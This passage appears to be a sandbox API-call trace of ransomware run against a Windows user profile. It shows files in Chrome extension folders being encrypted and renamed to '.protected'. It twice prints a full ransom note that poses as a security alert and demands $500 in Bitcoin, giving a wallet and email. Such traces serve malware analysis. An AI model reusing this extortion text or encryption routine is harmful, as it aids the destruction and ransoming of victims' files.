[0080.953] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da") returned 145 [0080.953] lstrcmpW (lpString1="da", lpString2=".") returned 1 [0080.953] lstrcmpW (lpString1="da", lpString2="..") returned 1 [0080.953] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\*") returned 147 [0080.953] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.953] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.954] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.954] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.954] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.954] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.954] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\.") returned 147 [0080.954] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.954] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.954] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.954] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.954] lstrcmpiW (lpString1="..", 
lpString2="Program Files (x86)") returned -1 [0080.954] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.954] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.954] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\..") returned 148 [0080.954] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.954] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.954] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.954] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.954] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.954] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.954] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.954] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.954] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\messages.json") returned 159 [0080.954] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.954] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.954] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.954] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.954] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.955] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\messages.json") returned 159 [0080.955] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.955] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\messages.json") returned 159 [0080.955] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.955] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\messages.json") returned 159 [0080.955] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.955] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x282, lpOverlapped=0x0) returned 1 [0080.957] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffd7e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.957] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x282, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, 
lpNumberOfBytesWritten=0x295d914*=0x282, lpOverlapped=0x0) returned 1 [0080.957] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.957] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.957] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.957] CloseHandle (hObject=0x168) returned 1 [0080.957] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\messages.json.protected") returned 169 [0080.958] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\messages.json.protected")) returned 1 [0080.959] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.959] FindClose (in: 
hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.959] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\RESTORE_FILES.txt") returned 163 [0080.959] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\da\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.960] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.960] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.961] lstrlenA (lpString="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") returned 684 [0080.961] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.961] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.961] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0080.961] CloseHandle (hObject=0x164) returned 1 [0080.961] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.961] lstrcmpiW (lpString1="de", lpString2="Windows") returned -1 [0080.961] lstrcmpiW (lpString1="de", lpString2="Program Files") returned -1 [0080.961] lstrcmpiW (lpString1="de", lpString2="Program Files (x86)") returned -1 [0080.961] lstrcmpiW (lpString1="de", lpString2="$Recycle.bin") returned 1 [0080.961] lstrcmpiW (lpString1="de", lpString2="System Volume Information") returned -1 [0080.961] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de") returned 145 [0080.961] lstrcmpW (lpString1="de", lpString2=".") returned 1 [0080.961] lstrcmpW (lpString1="de", lpString2="..") returned 1 [0080.961] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\*") returned 147 [0080.961] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.962] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.962] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.962] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.962] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.962] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.962] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, 
pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\.") returned 147 [0080.962] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.962] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.962] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.962] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.962] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.962] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.962] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.962] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\..") returned 148 [0080.962] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.962] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.962] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.962] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.962] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.962] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.962] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.962] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.962] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\messages.json") returned 159 [0080.962] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.962] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.962] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.962] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.962] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.963] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\messages.json") returned 159 [0080.963] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.963] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\messages.json") returned 159 [0080.963] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.964] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\messages.json") returned 159 [0080.964] StrStrW 
(lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.964] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2bd, lpOverlapped=0x0) returned 1 [0080.965] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffd43, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.965] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2bd, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2bd, lpOverlapped=0x0) returned 1 [0080.965] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.965] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.966] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.966] CloseHandle (hObject=0x168) returned 1 [0080.966] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\messages.json.protected") returned 169 [0080.966] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 
data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\messages.json.protected")) returned 1 [0080.967] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.967] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.967] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\RESTORE_FILES.txt") returned 163 [0080.967] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.967] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.967] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.968] lstrlenA (lpString="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") returned 684 [0080.968] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 
[0080.968] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.968] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.968] CloseHandle (hObject=0x164) returned 1 [0080.969] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.969] lstrcmpiW (lpString1="el", lpString2="Windows") returned -1 [0080.969] lstrcmpiW (lpString1="el", lpString2="Program Files") returned -1 [0080.969] lstrcmpiW (lpString1="el", lpString2="Program Files (x86)") returned -1 [0080.969] lstrcmpiW (lpString1="el", lpString2="$Recycle.bin") returned 1 [0080.969] lstrcmpiW (lpString1="el", lpString2="System Volume Information") returned -1 [0080.969] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el") returned 145 [0080.969] lstrcmpW (lpString1="el", lpString2=".") returned 1 [0080.969] lstrcmpW (lpString1="el", lpString2="..") returned 1 [0080.969] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\*") returned 147 [0080.969] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.969] 
lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.969] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.969] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.969] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.969] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.969] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\.") returned 147 [0080.969] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.969] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.969] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.969] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.969] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.969] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.969] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.969] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\el\\..") returned 148 [0080.969] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.970] lstrcmpW (lpString1="..", 